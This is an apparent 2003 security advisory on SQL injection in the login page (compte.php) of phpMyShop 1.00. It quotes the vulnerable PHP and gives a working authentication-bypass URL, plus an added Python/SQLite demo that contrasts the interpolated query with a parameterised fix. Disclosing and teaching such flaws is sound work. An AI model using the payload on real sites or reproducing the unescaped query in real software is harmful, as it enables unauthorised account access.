3rd Feb 2003 [SBWID-5963]
COMMAND
phpMyShop SQL Injection
SYSTEMS AFFECTED
phpMyShop 1.00
PROBLEM
Frog Man [[email protected]] found :
PHP Code/Location :
-------------------
compte.php :
---------------------------------------------------------------
<?
session_start();
if (isset($achat))
{
    session_register("achat");
}
else
{
    header("location:index.php");
}
include("design/header.php");
require("config.php");
require("fonction.php");
echo "<td bgcolor=\"$barre1\"><strong>Identification</strong></td>
</tr>
<tr>
<td><br>";
if (isset($valider)) {
    // $identifiant and $password arrive straight from the request (register_globals)
    // and are interpolated into the query string without any escaping.
    $sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where login_cli='$identifiant' and pass_cli='$password'";
    $sql = mysql_db_query($base,$sql);
    $test = mysql_num_rows($sql);
    if ($test=="0") { ?>
        <script language="javascript"> alert("Identifiant ou mot de passe non valide!"); </script>
    <?
        echo "<center><strong>Identifiant ou mot de passe non valide!</strong></center><br>";
    } else {
        // Whatever rows matched, row 0 becomes the logged-in member.
        $id_membre = mysql_result($sql,0,"id_cli");
        session_register("id_membre"); ?>
        <script language="javascript"> document.location.href="valide.php" </script>
    <? }
}
[...]
---------------------------------------------------------------
Exploit :
---------
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
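Added example (not part of the advisory or of phpMyShop): the login query from compte.php rebuilt in Python over an in-memory SQLite table standing in for the MySQL client table, once with the string interpolation the advisory shows and once with bound parameters. The table name "client", its rows and the helper names are constructed for this example; the input string is the advisory's payload URL-decoded.

```python
import sqlite3

# Constructed sample rows standing in for phpMyShop's $table_client
# (assumption: a table "client" with the columns the advisory's query selects).
SAMPLE_CLIENTS = [
    (1, "alice", "s3cret"),
    (2, "bob", "hunter2"),
]

# The advisory's payload, URL-decoded: identifiant='%20OR%20''='
INJECTED = "' OR ''='"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client (id_cli INTEGER, login_cli TEXT, pass_cli TEXT)")
    conn.executemany("INSERT INTO client VALUES (?, ?, ?)", SAMPLE_CLIENTS)
    return conn


def login_vulnerable(conn, identifiant, password):
    """Mirrors compte.php: request values interpolated into the SQL text.

    With INJECTED in both fields the WHERE clause reads
    login_cli='' OR ''='' and pass_cli='' OR ''=''  which, since AND binds
    tighter than OR, is true for every row; compte.php then treats row 0
    as the authenticated member, so the first account is logged in.
    """
    sql = ("SELECT id_cli,login_cli,pass_cli FROM client "
           f"where login_cli='{identifiant}' and pass_cli='{password}'")
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if rows else None


def login_fixed(conn, identifiant, password):
    """Same query with bound parameters: quotes in the input stay data."""
    sql = ("SELECT id_cli,login_cli,pass_cli FROM client "
           "where login_cli=? and pass_cli=?")
    rows = conn.execute(sql, (identifiant, password)).fetchall()
    return rows[0][0] if rows else None
```

The vulnerable form returns id_cli 1 for the payload without any valid credentials, while the parameterised form returns no row for it; ''='' evaluates true in MySQL exactly as it does in SQLite, so the comparison carries over.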
SOLUTION
Check http://www.pc-encheres.com
-Also-
A patch has been published on http://www.phpsecure.info.
More details :
--------------
http://www.frog-man.org/tutos/phpmyshop.txt